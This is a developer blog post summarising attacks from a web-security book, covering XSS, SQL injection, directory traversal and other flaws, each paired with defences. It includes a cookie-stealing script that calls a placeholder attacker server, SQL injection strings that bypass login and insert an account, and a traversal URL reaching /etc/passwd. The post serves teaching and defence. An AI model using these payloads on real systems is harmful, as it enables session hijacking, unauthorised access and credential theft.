Security Tips for Web Development

Anmol Agarwala
Aug 8, 2017 · 12 min read

So I started reading this book, How to Break Web Software, by Mike Andrews and James A. Whittaker. It’s a must-read for Web developers, as it explains the different ways one can break into a web application, and thereby the different security measures one should take while developing one.

I am listing a few important topics from this book that I feel every developer should know in order to secure their application.


The Web vs Client-Server

The WWW is a special case of the client-server paradigm. Client-server traditionally means one or more powerful centralized servers serving resources to thin clients, which usually existed within the walls of an organization (hence a protected environment). The clients are often “dumb”: they do no actual computation and merely provide an interface to the server. The Web, by contrast, uses fat clients operating on protocols and formats like HTTP, HTML, XML, and SOAP. It also adds the interesting problem of “untrusted” users, since it is open to anyone, anywhere. Apps are designed so that the more computation is pushed to the clients, the faster the central server can serve requests. This means every input generated at the client must be carefully checked, because the user has access to the code running on the client, and all security operations must be performed on the server. Another important property of the Web is that it is stateless (no information is stored on the server; every request is a new request), so any information that has to be carried across a Web session must be stored somewhere in between. It was therefore necessary to concoct an artificial mechanism for managing stateful transactions, which is why things like cookies and hidden fields have been so widely exploited.

Testing a Web server from the viewpoint of the Web client and the network is the main challenge of developing a Web app. The Web client is where all the important stuff takes place: it’s where your customers, as well as your adversaries, sit. A malicious user can tamper with all the data stored on the Web client, so don’t do any important computation or validation on the client side without double-checking the data on the server. Error messages from the server can also reveal a lot of important information, so be very careful about what message you display.

The lesson to learn is: trust no client, trust no network, and do all important processing on the server.


SOFTWARE TESTING

The purpose of software testing is to find defects and to provide evidence of their absence. Tests that find bugs are good tests because they allow us to reduce the number of latent bugs; tests that do not find bugs are also good tests because they are evidence that the software performs as specified. The attacks ahead can be used as a good set of tests for a piece of software.

ATTACK 1: KNOWING AND EXPLORING THE TARGET

An important part of any testing strategy is gathering as much information as possible. Map the site starting from the start page and subsequently visit the different pages. Document the whole flow, along with the parameters passed to reach each next page. Web crawlers (like wget or BlackWidow) can help, but doing it manually will make you more thorough. Once the application is mapped, visit each page and explore its source code. Look for any sensitive information present in the source (comments, hidden input fields, etc.). You might consider searching string patterns manually using regexes; a great tool for this is The Regulator (http://osherove.com/tools). One can look for:

  • HTML Comments
  • Application Comments
  • IP Addresses
  • E-mail Addresses
  • SQL Queries
  • Database Connection Strings
  • Hidden input fields
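These patterns lend themselves to regular-expression searches. A minimal Python sketch of such a scan; the patterns and the sample page source are illustrative assumptions, not from the book:

```python
import re

# Patterns for a few of the items listed above (illustrative, not exhaustive)
PATTERNS = {
    "html_comment": re.compile(r"<!--.*?-->", re.DOTALL),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "hidden_field": re.compile(r"<input[^>]*type=[\"']?hidden[\"']?", re.IGNORECASE),
}

def scan_page(html):
    """Return every suspicious string found in a page's source."""
    return {name: pat.findall(html) for name, pat in PATTERNS.items() if pat.findall(html)}

# A made-up page source for demonstration
page = '''<!-- TODO: remove before release, db at 10.0.0.5 -->
<input type="hidden" name="debug" value="1">
Contact admin@example.com'''

print(scan_page(page))
```

Running this against every mapped page gives a quick first pass before the manual review.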

After this, one can look into the parameters that are passed between pages. You can force the application to generate error messages that might be helpful to an attacker. The classic case of an overly helpful error message is the login page: if the application returns one error message for an incorrect username and another for an incorrect password, we’ve given our attacker very useful information.

Developers should be very careful about what comments they write in the code and what error messages they expose. Instead of showing details to the user, save them to a server-side log file; they are very helpful for debugging and for tracing issues or attacks.
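As a sketch of that advice, a server can log the precise failure reason while returning one generic message to the client. A minimal Python illustration; the function and the in-memory user table are invented for the example (real code would hash passwords and query a database):

```python
import logging

logging.basicConfig(level=logging.WARNING)

# Hypothetical login check; 'user_db' stands in for a real database lookup,
# and passwords are compared in plaintext only for brevity (store hashes in practice).
def login(username, password, user_db):
    user = user_db.get(username)
    if user is None:
        # Log the precise reason server-side...
        logging.warning("login failed: unknown user %r", username)
    elif user["password"] != password:
        logging.warning("login failed: bad password for %r", username)
    else:
        return "Welcome!"
    # ...but show the client one generic message for both failure modes.
    return "Invalid username or password."
```

The attacker probing the login page now learns nothing about which half of the credentials was wrong.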

ATTACK 2 : GUESSING FILES AND DIRECTORIES

At the simplest level, Web pages are files on a Web server that anyone can access. Once we have the site map, it is easier to see the page-naming conventions. For example, when documents are uploaded they may be given sequential numbers; one might access other, supposedly restricted documents by finding the pattern of the sequence. Control pages can be hidden in two ways: on a separate sub-site, as in /admin, /cp, etc., or running on a different port. One can make intelligent guesses or scan all the ports to discover them.

To protect against this attack, first configure the Web server to serve only the pages of the application. The following Apache configuration allows requests for PHP pages but denies requests for any other files:

# deny every file whose name does not end in .php/.php3/.php4 (PCRE negative lookahead)
<FilesMatch "^(?!.*\.(php|php3|php4)$).*$">
Order allow,deny
Deny from all
</FilesMatch>

Another way to restrict access to administrative pages or sections is to password-protect entry to those sections. You can achieve this in various ways (basic, digest, and forms-based authentication). Each method has its own potential vulnerabilities, but they all add an extra level of security.

On an Apache server you can create an .htaccess file containing the following text in the directory you want to protect:

AuthName "admin pages"
AuthType Basic
AuthUserFile /path/to/.htpasswd
Require valid-user

Then you need to create a password file by running the htpasswd program. Store the file somewhere the Web server can access it, but not alongside the other Web documents:

# htpasswd -cm .htpasswd username

Now whenever a user requests a file within the directory where the .htaccess file is located, the browser will ask for a username and password.

You can also configure the Web server to serve files only to specific network addresses, or use a firewall to block access to ports except from the internal network, limiting the range from which attacks can originate.

A developer should also analyze the potential vulnerabilities in third-party components being used in the application and make sure the components are updated frequently.

ATTACK 3 : BYPASS INPUT RESTRICTIONS AND VALIDATION ON CLIENT SIDE

In any application, users make choices via input elements like forms, text boxes, menus, radio buttons, etc. This attack is all about the attitude of trusting the user interface. The user interface sits on a client computer and can easily be bypassed or modified: users can either change the source code or modify the requests on the fly as the form is submitted. For example:

<input name="cardnumber" maxlength="16"/>
or,
<SELECT name=1>
<OPTION value=0 selected>0</OPTION>
<OPTION value=1>1</OPTION>
.........
<OPTION value=10>10</OPTION>
</SELECT>

Users can simply modify these parameters and change how the application behaves. In the second case, a user can modify the input options and select negative values. You wouldn’t want that on your e-commerce site, where a negative quantity could produce a negative amount and end with you paying the customer. One topic we will return to over and over is that clients cannot be trusted: re-validate on the server.

Validating that someone has entered valid input is difficult to do with user-interface elements alone. We can allow users to enter free text and perform the validation on the server, but that brings two additional problems. The first is performance, as a round-trip to the server takes time and bandwidth. The second is usability: users like to be informed of the errors they make so that they can correct them and resubmit. This is where scripting comes in; scripting is an easy way to give the user local error messages. Another alternative developers use is hidden fields, where the actual validation driven by the hidden fields occurs on the server. For example:

<input type="text" name="StartDate" size="16" maxlength="16"><br>
<input type="hidden" name="StartDate_required" value="You must enter a start date.">

An attacker would first discover whether client-side validation is being performed, by turning off the ability to run scripts in the browser or by selectively disabling scripts. If, on passing invalid inputs, the server doesn’t throw any error, the validation has been bypassed.

The main issue that makes this attack successful is trusting the client to do the right thing. Even when you are performing client-side validation, you have to make sure the same validation is being performed on the server.

Validating Input
There are two methods of validating input: white lists and black lists. A white list enumerates acceptable inputs; a black list enumerates unacceptable ones. White lists are the better approach, because with a black list one must know every wrong input; miss one and that input passes validation.
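A white list can be as simple as one regular expression per field, applied on the server. A minimal Python sketch; the field names and formats are illustrative assumptions:

```python
import re

# Whitelist patterns: each field admits only the exact shape we expect.
WHITELIST = {
    "accountid": re.compile(r"^[A-Za-z0-9]{1,16}$"),
    "quantity":  re.compile(r"^[1-9]\d{0,2}$"),   # 1-999, so no negative amounts
    "zipcode":   re.compile(r"^\d{5}$"),
}

def validate(field, value):
    """Accept a value only if it matches the field's whitelist pattern."""
    pattern = WHITELIST.get(field)
    return bool(pattern and pattern.fullmatch(value))
```

Note that a tampered form value like a negative quantity, or an injection string in an account ID, simply fails to match and is rejected.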

ATTACK 4: COOKIE POISONING

The designers of the Web never intended cookies to be secure. Cookies are a kind of extension to HTTP for saving client-side state: small files of textual data written to the client’s hard drive, which the Web application reuses on subsequent visits to remember the visitor. A lot of important information is stored in these cookies, such as the expiration date and session information. All of this is available for user modification and for session hijacking, which I will explain in a separate attack. Developers should encrypt sensitive data before storing it in a cookie, and should not rely on the cookie’s expiration date, because it can easily be tampered with.
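One common way to make cookie data tamper-evident (a lighter alternative to full encryption) is to sign it with an HMAC keyed by a server-side secret. A minimal Python sketch; the key and cookie format are illustrative:

```python
import hmac, hashlib

SECRET_KEY = b"keep-this-on-the-server"  # illustrative; load from config in practice

def sign_cookie(value):
    """Append an HMAC so any client-side tampering is detectable."""
    mac = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"

def verify_cookie(cookie):
    """Return the value if the signature checks out, else None."""
    value, _, mac = cookie.rpartition("|")
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None
```

A client who edits the value (say, the expiration date) without knowing the server-side key cannot produce a matching signature, so the server simply rejects the cookie.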

ATTACK 5 : URL JUMPING

Since the Web is essentially stateless, users can jump to any page directly by using that page’s URL. That’s not what an e-commerce site would want: just skip the payment page, go to the checkout page, and get a free product. There are lots of other cases where the sequence is very important. To track the sequence, developers can use hidden or CGI parameters, cookies, or the HTTP Referer field. None of these methods is completely secure, as all of them can be modified, but they are still useful for basic checks on the client side itself. Below is a sample HTTP request header.

GET /articles/news/today.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Connection: Keep-Alive
Host: localhost
Referer: http://www.myhomepage.com/links.asp
User...........

There is no secure place to store the last-visited page other than the server, but that requires session variables and opens up the possibility of session-hijacking attacks. To protect against this, consider encrypting the data and keeping the keys on the server itself.
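One server-side way to stop URL jumping is to record, in the session, which steps the user has completed, and refuse any request that skips ahead. A minimal Python sketch with an invented checkout flow; the session dict stands in for real server-side session storage:

```python
# The required page order; a request may not skip ahead of it.
CHECKOUT_FLOW = ["cart", "shipping", "payment", "confirm"]

def may_visit(session, requested_step):
    """Allow a step only if every earlier step was already completed."""
    completed = session.get("completed_steps", set())
    index = CHECKOUT_FLOW.index(requested_step)
    return all(step in completed for step in CHECKOUT_FLOW[:index])

def complete(session, step):
    """Record a finished step in the server-side session."""
    session.setdefault("completed_steps", set()).add(step)
```

Because the completed-steps record never leaves the server, pasting the confirm page’s URL directly gets the user nothing.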

ATTACK 6: SESSION HIJACKING

Session management solves many of the problems of storing state in a Web application; the issue is that if it’s not implemented correctly, it is open to attack. Servers associate each client with a unique identifier used to maintain its state, usually stored in a cookie or sometimes passed as a CGI parameter. The attacker’s objective is to masquerade as a legitimate user by using a session identifier stolen from a logged-in user. (The cross-site scripting attack is usually associated with this; sometimes network monitoring is used as well.)

Session management is crucial to protect against this attack. Use cookies to store session values and set the “secure” flag to ensure they are sent over HTTPS only. Session identifiers should be generated so randomly that no one can guess them by mere enumeration. The HTTP Referer field can help identify multiple clients browsing the same site with the same ID. Even with these precautions, an attacker might still steal the cookie through cross-site scripting, so let’s discuss how to protect against cross-site scripting next.
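For the randomness requirement, here is a sketch in Python of generating an unguessable session identifier, plus the corresponding cookie flags (the HttpOnly flag, which hides the cookie from page scripts, also limits theft via XSS); the cookie name is illustrative:

```python
import secrets

def new_session_id():
    # 32 random bytes, URL-safe encoded: infeasible to guess by enumeration
    return secrets.token_urlsafe(32)

def session_cookie(session_id):
    # Secure: sent over HTTPS only; HttpOnly: unreadable by page scripts,
    # which limits cookie theft via cross-site scripting
    return f"Set-Cookie: SESSIONID={session_id}; Secure; HttpOnly; Path=/"
```

Sequential or timestamp-derived identifiers, by contrast, are exactly the kind an attacker can enumerate.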

ATTACK 7 : CROSS-SITE SCRIPTING

Cross-site scripting (XSS) is when a malicious user gets a script executed on another user’s computer. When the user visits an XSS-vulnerable website, the malicious script has access to the current page and to everything the browser can access, like cookies and other local resources. The most common places for attackers are comment boxes, reviews, etc., which are presented to other users too; attackers can introduce scripts there, which the browser then executes rather than displays. Attackers may also present users with scripts embedded in the CGI parameters of a URL, so that when the user clicks the link, the real page is loaded with the script executed.

<script>
document.write('<img src="http://attackers-server/log?cookie=' + document.cookie + '">');
</script>

In the above example, the attacker passes the cookie of the victim’s session as a CGI parameter; he can read it from his own server’s log entry for the image URL and can then masquerade as the victim. An attacker can also modify the content of sites people trust and change their opinions, and changing a form’s action attribute can redirect submissions to a URL where the victim’s credentials are logged.

To protect against this attack, filter inputs and only allow data that is legitimate.
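Complementary to input filtering, user-supplied text should be escaped when it is written back into a page, so the browser displays it rather than executing it. A minimal Python sketch using the standard library’s html.escape; the wrapper function is illustrative:

```python
import html

def render_comment(comment):
    """Escape user-supplied text before echoing it into a page,
    so <script> arrives as harmless &lt;script&gt; markup."""
    return f"<p>{html.escape(comment)}</p>"

print(render_comment("<script>alert(document.cookie)</script>"))
```

With escaping on output, even a script that slipped past input filtering is rendered as inert text.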

ATTACK 8: SQL INJECTION

Many Web applications use some kind of SQL database to store information like account records, product info, etc. SQL commands form the interface between the Web front end and the back end that supplies data to the user, but the SQL queries are also generated dynamically, using parameters the user supplies via form fields, CGI parameters, input boxes, etc. For example:

SELECT accountdata FROM accountinfo where accountid = 'accountnumber' AND password = 'apassword'

The above SQL query would retrieve a legitimate user’s data. But notice carefully that the user-supplied data sits inside those quoted strings. A user can use the SQL comment operator (--, two dashes) and type the following in the form: Sam' -- leading to the following SQL query:

SELECT accountdata FROM accountinfo
where accountid = 'Sam' --'
AND password = 'apassword'

But because everything after the comment operator is ignored, voila: we’ve just pulled the account data of some other user without knowing the password. Further, let’s say a login form ends up running the following SQL query:

SELECT accountdata FROM accountinfo WHERE accountid = '' OR 1=1

Because 1=1 always evaluates to true, and anything OR’d with true is also true, the whole condition succeeds; if the developer is just checking whether the username-and-password combination exists, we are in. We can also inject our own SQL statement like this:

SELECT accountdata FROM accountinfo WHERE accountid = '';
INSERT INTO accountdata (accountid, password) VALUES('mike', '1234') -- ' AND password = ''

The protection against this attack is, again, filtering user input before the queries are submitted to the database, and the filtering should be done on the server rather than on the client. Further, developers often use a single database login with broad rights (sometimes even the administrator account). Instead, separate login accounts with different access levels should be created according to what each user should be allowed to do; then, even if an SQL injection occurs, the damage is confined to the data that account can normally access.
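Beyond filtering, most database drivers also support parameterized queries, which keep user input out of the SQL text entirely. A sketch using Python’s sqlite3 module, reusing the table and column names from the examples above (the sample row is invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accountinfo (accountid TEXT, password TEXT, accountdata TEXT)")
conn.execute("INSERT INTO accountinfo VALUES ('Sam', 'apassword', 'sam-data')")

def get_account(accountid, password):
    # The ? placeholders make the driver treat inputs as data, never as SQL.
    cur = conn.execute(
        "SELECT accountdata FROM accountinfo WHERE accountid = ? AND password = ?",
        (accountid, password),
    )
    return cur.fetchone()

print(get_account("Sam", "apassword"))   # the legitimate row is returned
print(get_account("Sam' --", "x"))       # the injection attempt matches nothing
```

The comment trick and the OR 1=1 trick both fail here, because the quote and the dashes are compared literally against the stored account IDs.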

ATTACK 9: DIRECTORY TRAVERSAL

Web pages are just files that reside on the Web server, and it’s the server’s job to restrict which files users have access to. This attack is carried out by changing CGI parameters in the URL that are being used to retrieve files. Attackers can try traversing, using the parent-directory sequence (../), into directories they should never have access to, such as where usernames and passwords are stored on the system. If the site allows users to upload files and access them, we should also check that an attacker can’t upload executable scripts and then run them by requesting them. Some examples:

http://www.xyz.com/getreport.asp?item=getreport.asp
Here the attacker is trying to fetch the source code of the page.
http://www.xyz.com/getreport.asp?item=../../../etc/passwd
Here the attacker is trying to traverse to the file where usernames and passwords are stored on UNIX systems.

The main way to protect against this attack is to restrict the Web application to serving pages only from its own directory or sub-directories. This is called “root-jailing” the Web directory, making it look like the root of the file system. Access Control Lists (ACLs) are another important way to restrict which files a user can access and what actions can be performed on those files.
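A root-jail check can be sketched in a few lines: resolve the requested path and refuse anything that lands outside the Web root. A minimal Python sketch; the web-root path is an illustrative assumption:

```python
import os

WEB_ROOT = os.path.realpath("/var/www/html")  # illustrative web root

def safe_path(requested):
    """Resolve a requested file and refuse anything outside the web root."""
    full = os.path.realpath(os.path.join(WEB_ROOT, requested))
    # realpath collapses ../ sequences, so a traversal attempt fails this check
    if os.path.commonpath([full, WEB_ROOT]) != WEB_ROOT:
        raise PermissionError(f"directory traversal attempt: {requested}")
    return full
```

A request for ../../../etc/passwd resolves to /etc/passwd, which no longer shares the Web root as a prefix and is rejected.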

ATTACK 10: BUFFER OVERFLOWS

This is one of the most exploited attacks out there. Buffer overflows occur when a function in a program fails to check the size of the input data it is processing. What attackers exploit is input data overflowing into the memory that holds the “return address”, which is used to choose the next instruction. The data effectively becomes an instruction to the computer, which can allow an attacker to run arbitrary code on our Web server: a game-over scenario. To protect against this, always check the size of input data before copying it into a fixed-size buffer. Adding a client-side size check is also good for rejecting unnecessary bad requests, but add a server-side check for the smart ones.

ATTACK 11: DENIAL OF SERVICE(DoS)

This attack mainly aims at bringing the Web server down and making it inaccessible to other users. Attackers make the server process a large number of Web requests, or long-running operations like searches, SQL queries, etc., so that the server cannot process other requests. Protecting against this is pretty difficult from the Web-application or server point of view. There are methods available, like load-balancing requests at the network level itself, and intrusion-detection systems prove useful in these cases, but there is no one-shot solution. The approach has to be detection and recovery: detect the attack and stop the offending sources from sending more requests.
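One common detection-and-throttling building block (my example, not from the book) is a per-client token bucket: each request spends a token, tokens refill at a fixed rate, and bursts beyond the budget are rejected. A minimal Python sketch:

```python
import time

class TokenBucket:
    """Per-client rate limiter: each request spends one token;
    tokens refill at a fixed rate, so sustained floods get rejected."""

    def __init__(self, capacity=10, refill_per_sec=1.0):
        self.capacity = capacity
        self.tokens = float(capacity)
        self.refill = refill_per_sec
        self.last = time.monotonic()

    def allow(self):
        # Top up tokens for the time elapsed since the last request
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.refill)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False
```

A server would keep one bucket per client address and drop (or delay) requests when allow() returns False; legitimate traffic under the budget is unaffected.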


A few more guidelines: never use your own cryptography algorithm in your application; use ones that have been heavily tested and are publicly recommended. And use HTTPS wherever the data sent to the server is confidential, so that it is encrypted on the network.
